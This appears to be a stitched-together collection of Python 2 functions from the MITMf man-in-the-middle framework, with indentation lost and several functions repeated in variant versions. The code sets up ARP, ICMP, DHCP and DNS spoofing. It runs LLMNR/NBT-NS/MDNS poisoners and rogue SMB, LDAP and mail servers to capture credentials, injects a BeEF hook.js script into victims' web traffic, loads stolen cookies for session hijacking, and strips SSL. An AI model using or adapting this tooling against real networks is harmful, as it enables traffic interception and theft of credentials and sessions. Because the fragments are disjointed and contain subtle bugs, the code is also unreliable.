def getTargetRange(self, targets):
if targets is None:
return None
try:
targetList = []
for target in targets.split(','):
if '/' in target:
targetList.append(IPNetwork(target))
elif '-' in target:
first_half = target.split('-')[0]
second_half = first_half + target.split('-')[1]
targetList.append(IPRange(first_half, second_half))
else:
targetList.append(IPAddress(target))
return targetList
except AddrFormatError as e:
shutdown(
"[ARPpoisoner] Specified an invalid IP address/range/network as target"
)
def start(self):
if self.gatewaymac is None:
shutdown(
"[ARPpoisoner] Error: Could not resolve gateway's MAC address")
mitmf_logger.debug("[ARPpoisoner] gatewayip => {}".format(
self.gatewayip))
mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(
self.gatewaymac))
mitmf_logger.debug("[ARPpoisoner] targets => {}".format(
self.targets))
mitmf_logger.debug("[ARPpoisoner] mymac => {}".format(self.mymac))
mitmf_logger.debug("[ARPpoisoner] interface => {}".format(
self.interface))
mitmf_logger.debug("[ARPpoisoner] arpmode => {}".format(
self.arpmode))
mitmf_logger.debug("[ARPpoisoner] interval => {}".format(
self.interval))
if self.arpmode == 'rep':
t = threading.Thread(name='ARPpoisoner-rep',
target=self.poisonARPrep)
elif self.arpmode == 'req':
t = threading.Thread(name='ARPpoisoner-req',
target=self.poisonARPreq)
t.setDaemon(True)
t.start()
def __init__(self):
try:
self.msf = Msfrpc({"host": self.config['MITMf']['Metasploit']['rpcip'],
"port": self.config['MITMf']['Metasploit']['rpcport']})
self.msf.login('msf', self.config['MITMf']['Metasploit']['rpcpass'])
except Exception as e:
shutdown("[Msfrpc] Error connecting to Metasploit: {}".format(e))
def start(self):
try:
self.gatewaymac = getmacbyip(self.gatewayip)
if self.gatewaymac is None:
shutdown(
"[ARPWatch] Error: Could not resolve gateway's MAC address"
)
except Exception, e:
shutdown(
"[ARPWatch] Exception occured while resolving gateway's MAC address: {}"
.format(e))
def start(self):
self.on_config_change()
self.start_config_watch()
try:
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
self.startTCP()
else:
self.startUDP()
except socket.error as e:
if "Address already in use" in e:
shutdown("\n[DNS] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
def __init__(self, listenAddress='0.0.0.0', listenPort=445, configFile=''):
try:
self.server = smbserver.SimpleSMBServer(listenAddress, listenPort,
configFile)
self.server.setSMBChallenge(
self.config["MITMf"]["SMB"]["Challenge"])
except socketerror as e:
if "Address already in use" in e:
shutdown(
"\n[-] Unable to start SMB server on port 445: port already in use"
)
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.interface = options.interface
self.ourip = SystemConfig.getIP(options.interface)
try:
config = self.config['Responder']
smbChal = self.config['MITMf']['SMB']['Challenge']
except Exception as e:
shutdown('[-] Error parsing config for Responder: ' + str(e))
LANFingerprinter().start(options)
MDNSPoisoner().start(options, self.ourip)
NBTNSPoisoner().start(options, self.ourip)
LLMNRPoisoner().start(options, self.ourip)
if options.wpad:
from core.responder.wpad.WPADPoisoner import WPADPoisoner
WPADPoisoner().start(options)
if self.config["Responder"]["MSSQL"].lower() == "on":
from core.responder.mssql.MSSQLServer import MSSQLServer
MSSQLServer().start(smbChal)
if self.config["Responder"]["Kerberos"].lower() == "on":
from core.responder.kerberos.KERBServer import KERBServer
KERBServer().start()
if self.config["Responder"]["FTP"].lower() == "on":
from core.responder.ftp.FTPServer import FTPServer
FTPServer().start()
if self.config["Responder"]["POP"].lower() == "on":
from core.responder.pop3.POP3Server import POP3Server
POP3Server().start()
if self.config["Responder"]["SMTP"].lower() == "on":
from core.responder.smtp.SMTPServer import SMTPServer
SMTPServer().start()
if self.config["Responder"]["IMAP"].lower() == "on":
from core.responder.imap.IMAPServer import IMAPServer
IMAPServer().start()
if self.config["Responder"]["LDAP"].lower() == "on":
from core.responder.ldap.LDAPServer import LDAPServer
LDAPServer().start(smbChal)
if options.analyze:
self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
self.IsICMPRedirectPlausible(self.ourip)
def onConfigChange(self):
beefconfig = self.config['MITMf']['BeEF']
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(
self.ip_address, beefconfig['beefport'])
self.beef = BeefAPI({
"host": beefconfig['beefip'],
"port": beefconfig['beefport']
})
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[-] Error logging in to BeEF!")
def initialize(self, options):
self.options = options
self.ip_address = SystemConfig.getIP(options.interface)
Inject.initialize(self, options)
self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
beefconfig = self.config['MITMf']['BeEF']
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
def parseConfig(self):
server = None
try:
if self.server_type == 'normal':
formatter = logging.Formatter(
"%(asctime)s [SMBserver] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S")
self.configureLogging(formatter)
server = smbserver.SimpleSMBServer(listenPort=self.smb_port)
for share in self.config["MITMf"]["SMB"]["Shares"]:
path = self.config["MITMf"]["SMB"]["Shares"][share]['path']
readonly = self.config["MITMf"]["SMB"]["Shares"][share][
'readonly'].lower()
server.addShare(share.upper(), path, readOnly=readonly)
server.setSMBChallenge(self.smbchallenge)
server.setLogFile('')
elif self.server_type == 'karma':
formatter = logging.Formatter(
"%(asctime)s [KarmaSMB] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S")
self.configureLogging(formatter)
server = KarmaSMBServer(self.smbchallenge, self.smb_port)
server.defaultFile = self.config["MITMf"]["SMB"]["Karma"][
"defaultfile"]
for extension, path in self.config["MITMf"]["SMB"][
"Karma"].iteritems():
server.extensions[extension.upper()] = os.path.normpath(
path)
else:
shutdown(
"\n[-] Invalid SMB server type specified in config file!")
return server
except socketerror as e:
if "Address already in use" in e:
shutdown(
"\n[-] Unable to start SMB server on port {}: port already in use"
.format(self.smb_port))
def __init__(self, gateway, interface, mac, targets):
try:
self.gatewayip = str(IPAddress(gateway))
except AddrFormatError as e:
shutdown(
"[ARPpoisoner] Specified an invalid IP address as gateway")
self.gatewaymac = getmacbyip(gateway)
self.mymac = mac
self.targets = self.getTargetRange(targets)
self.interface = interface
self.arpmode = 'rep'
self.debug = False
self.send = True
self.interval = 3
def initialize(self, options):
self.options = options
self.ip_address = options.ip
beefconfig = self.config['MITMf']['BeEF']
Inject.initialize(self, options)
self.js_url = 'http://{}:{}/hook.js'.format(options.ip , ['port'])
beefconfig = self.config['MITMf']['BeEF']
from core.utils import shutdown
beef = BeefAPI({"host": beefconfig['host'], "port": beefconfig['port']})
if not beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
self.tree_info.append('Starting RuleWatcher')
RuleWatcher(beef, self.log).start()
def initialize(self, options):
self.options = options
self.ferret_port = options.ferret_port
self.cookie_file = None
URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
from core.utils import shutdown
if options.cookie_file:
self.tree_info.append('Loading cookies from log file')
try:
with open(options.cookie_file, 'r') as cookie_file:
self.cookie_file = json.dumps(cookie_file.read())
URLMonitor.getInstance().cookies = self.cookie_file
except Exception as e:
shutdown("[-] Error loading cookie log file: {}".format(e))
self.tree_info.append("Listening on port {}".format(self.ferret_port))
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.ferret_port = 10010 or options.ferret_port
self.cookie_file = None
URLMonitor.getInstance(
).hijack_client = self.config['Ferret-NG']['Client']
if options.cookie_file:
self.tree_info.append('Loading cookies from log file')
try:
with open(options.cookie_file, 'r') as cookie_file:
self.cookie_file = ast.literal_eval(cookie_file.read())
URLMonitor.getInstance().cookies = self.cookie_file
cookie_file.close()
except Exception as e:
shutdown("[-] Error loading cookie log file: {}".format(e))
self.tree_info.append("Listening on port {}".format(self.ferret_port))
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.dnscfg = self.config['MITMf']['DNS']
self.dhcpcfg = self.config['Spoof']['DHCP']
self.targets = options.targets
self.arpmode = options.arpmode or 'rep'
self.manualiptables = options.manualiptables
self.mymac = SystemConfig.getMAC(options.interface)
self.myip = SystemConfig.getIP(options.interface)
self.protocolInstances = []
#Makes scapy more verbose
debug = False
if options.arp:
if not options.gateway:
shutdown("[-] --arp argument requires --gateway")
if options.targets is None:
#if were poisoning whole subnet, start ARP-Watch
arpwatch = ARPWatch(options.gateway, self.myip,
options.interface)
arpwatch.debug = debug
self.tree_info.append("ARPWatch online")
self.protocolInstances.append(arpwatch)
arp = ARPpoisoner(options.gateway, options.interface, self.mymac,
options.targets)
arp.arpmode = self.arpmode
arp.debug = debug
self.protocolInstances.append(arp)
elif options.icmp:
if not options.gateway:
shutdown("[-] --icmp argument requires --gateway")
if not options.targets:
shutdown("[-] --icmp argument requires --targets")
icmp = ICMPpoisoner(options.interface, options.targets,
options.gateway, self.myip)
icmp.debug = debug
self.protocolInstances.append(icmp)
elif options.dhcp:
if options.targets:
shutdown("[-] --targets argument invalid when DCHP spoofing")
dhcp = DHCPServer(options.interface, self.dhcpcfg, self.myip,
self.mymac)
dhcp.shellshock = options.shellshock
dhcp.debug = debug
self.protocolInstances.append(dhcp)
if options.dns:
if not options.manualiptables:
if IpTables.getInstance().dns is False:
IpTables.getInstance().DNS(self.dnscfg['port'])
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
shutdown(
"[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
SystemConfig.setIpForwarding(1)
if not options.manualiptables:
if IpTables.getInstance().http is False:
IpTables.getInstance().HTTP(options.listen)
for protocol in self.protocolInstances:
protocol.start()
for line in xrange(0, len(plugin.tree_info)):
print "| |_ {}".format(plugin.tree_info.pop())
plugin.start_config_watch()
if options.filter:
from core.packetfilter import PacketFilter
pfilter = PacketFilter(options.filter)
print "|_ PacketFilter online"
for filter in options.filter:
print " |_ Applying filter {} to incoming packets".format(filter)
try:
pfilter.start()
except KeyboardInterrupt:
pfilter.stop()
shutdown()
else:
from core.sslstrip.CookieCleaner import CookieCleaner
from core.sslstrip.StrippingProxy import StrippingProxy
from core.sslstrip.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
URLMonitor.getInstance().setCaching(options.preserve_cache)
CookieCleaner.getInstance().setEnabled(options.killsessions)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(options.listen_port, strippingFactory)
def serve_dir(self, dir):
import threading
import posixpath
import urllib
import os
from SimpleHTTPServer import SimpleHTTPRequestHandler
from BaseHTTPServer import HTTPServer as ServerClass
Protocol = "HTTP/1.0"
port = self.config['Captive']['Port']
ServerString = self.config['Captive']['ServerString']
self.portalurl = "http://{}:{}/".format(self.hostname, port)
ROUTES = (['', dir], )
class HandlerClass(SimpleHTTPRequestHandler):
'''HandlerClass adapted from https://gist.github.com/creativeaura/5546779'''
def translate_path(self, path):
'''translate path given routes'''
# set default root to cwd
root = os.getcwd()
# look up routes and set root directory accordingly
for pattern, rootdir in ROUTES:
if path.startswith(pattern):
# found match!
path = path[len(
pattern):] # consume path up to pattern len
root = rootdir
break
# normalize path and prepend root directory
path = path.split('?', 1)[0]
path = path.split('#', 1)[0]
path = posixpath.normpath(urllib.unquote(path))
words = path.split('/')
words = filter(None, words)
path = root
for word in words:
drive, word = os.path.splitdrive(word)
head, word = os.path.split(word)
if word in (os.curdir, os.pardir):
continue
path = os.path.join(path, word)
return path
server_address = ('0.0.0.0', int(port))
HandlerClass.protocol_version = Protocol
HandlerClass.server_version = ServerString
httpd = ServerClass(server_address, HandlerClass)
ServerClass.path = dir
sa = httpd.socket.getsockname()
try:
t = threading.Thread(name='PortalServer',
target=httpd.serve_forever)
t.setDaemon(True)
t.start()
self.tree_info.append(
"Portal Server instance running on port {} serving {}".format(
port, dir))
except Exception as e:
shutdown("Failed to start Portal Server")
def initialize(self, options):
'''Called if plugin is enabled, passed the options namespace'''
self.options = options
self.protocol_instances = []
from core.utils import iptables, shutdown, set_ip_forwarding
#Makes scapy more verbose
debug = False
if options.arp:
if not options.gateway:
shutdown("[Spoof] --arp argument requires --gateway")
from core.poisoners.ARP import ARPpoisoner
arp = ARPpoisoner(options)
arp.debug = debug
self.tree_info.append('ARP spoofing enabled')
self.protocol_instances.append(arp)
elif options.dhcp:
from core.poisoners.DHCP import DHCPpoisoner
if options.targets:
shutdown(
"[Spoof] --targets argument invalid when DCHP spoofing")
dhcp = DHCPpoisoner(options)
dhcp.debug = debug
self.tree_info.append('DHCP spoofing enabled')
self.protocol_instances.append(dhcp)
elif options.icmp:
from core.poisoners.ICMP import ICMPpoisoner
if not options.gateway:
shutdown("[Spoof] --icmp argument requires --gateway")
if not options.targets:
shutdown("[Spoof] --icmp argument requires --targets")
icmp = ICMPpoisoner(options)
icmp.debug = debug
self.tree_info.append('ICMP spoofing enabled')
self.protocol_instances.append(icmp)
if options.dns:
self.tree_info.append('DNS spoofing enabled')
if iptables().dns is False:
iptables().DNS(self.config['MITMf']['DNS']['port'])
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
shutdown(
"[Spoof] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
set_ip_forwarding(1)
if iptables().http is False:
iptables().HTTP(options.listen_port)
for protocol in self.protocol_instances:
protocol.start()
